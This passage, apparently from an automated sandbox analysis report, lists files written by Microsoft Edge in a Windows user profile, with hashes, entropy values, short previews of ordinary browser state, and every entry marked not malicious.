                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):429
                                Entropy (8bit):5.809210454117189
                                Encrypted:false
                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                Malicious:false
                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0e2e51d6-c0d0-43fe-b2ec-2b93753658b0.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2b307bcb-b333-4bdf-b243-279f6f6d42df.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\56057993-2fc2-4fa3-88a6-859cf957c524.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):3.926136109079379
                                Encrypted:false
                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF35296.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):61
                                Entropy (8bit):3.926136109079379
                                Encrypted:false
                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):36864
                                Entropy (8bit):0.555790634850688
                                Encrypted:false
                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF337da.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF34920.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF34fa8.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):203
                                Entropy (8bit):5.4042796420747425
                                Encrypted:false
                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                Malicious:false
                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF35296.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):203
                                Entropy (8bit):5.4042796420747425
                                Encrypted:false
                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                Malicious:false
                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\b57efe2c-4f5d-44fd-9403-9e7cbc769f98.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):111
                                Entropy (8bit):4.718418993774295
                                Encrypted:false
                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                MD5:285252A2F6327D41EAB203DC2F402C67
                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dea9234b-e374-4a7b-b306-f4b6291096c7.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e423bdd9-66d0-4ccd-b58d-c2e47823ed72.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):5.423404609678128
                                Encrypted:false
                                SSDEEP:3:YWRAWNjBSVVLTRn0xmuRA9E+L3x8HQXwlm9yJUA6XcIR6RX77XMqGwmvXjz2SQ:YWyWN1iL50xHA9vh8wXwlmUUAnIMp5sO
                                MD5:6833E2FEEACF2930174137246FC7E09F
                                SHA1:7707DD22D2CFD3C3B79D727C93AE1D3DFD90B307
                                SHA-256:839EB286A9A424BFB655D9DA050BE4CAE90B3DE4894CFE1F352919B551F17C0C
                                SHA-512:B987F42C327EA83EE824E0E9BBC2AE5727CBB3B8DF29659C7E11798E24D5F8A94A05644200B6B57754876050E805EEAB90A0DAC437296BFED54C49535AF133C0
                                Malicious:false
                                Preview:{"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f2f1c62a-ca9a-43d5-b4f1-df779ca148af.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF364d5.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3ae13.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):33
                                Entropy (8bit):4.051821770808046
                                Encrypted:false
                                SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                Malicious:false
                                Preview:{"preferred_apps":[],"version":1}

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                Download File
